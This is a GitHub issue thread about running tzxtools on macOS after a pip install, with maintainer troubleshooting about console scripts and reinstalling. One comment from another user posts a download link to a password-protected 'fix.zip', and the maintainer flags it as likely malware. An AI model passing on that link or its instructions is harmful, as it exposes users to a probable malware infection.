### ISSUE TITLE
Question: how to run on macOS?

### ISSUE THREAD

**Issue by pedgemedia** [shred/tzxtools#15]
Hi,

Please note I am a Python noob so its probably my own fault, but after successfully installing tzxtools on macOS I cannot seem to run them.

The tools are present in .../Library/Python/3.9/lib/python/site-packages but how do I run the tools? 

`zsh: command not found: tzxtap`

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shred** [comment]
**IMPORTANT:** If you received the previous comment by bkballoon, please delete it. The link provided in the comment is most likely malware. The user has been blocked and reported.

**Comment by shred** [comment]
I'm sorry, but I don't have a Mac, so I cannot help you much here.

Did you install tzxtools via pip, like described in the README? `pip3 install tzxtools`

All the tools should be available after that way of installation.

**Comment by shred** [comment]
That's correct... The py files are not meant to be invoked like that. When the package is installed, pip generates _console scripts_ for that. They are supposed to be in your path, and invokes the py scripts for you.

If these console scripts are not found, it seems that the pip installation went wrong.

You can try to reinstall the package, e.g. with `pip install --force-reinstall tzxtools`.

**Comment by shred** [comment]
I'm glad you could make it work. :smile:
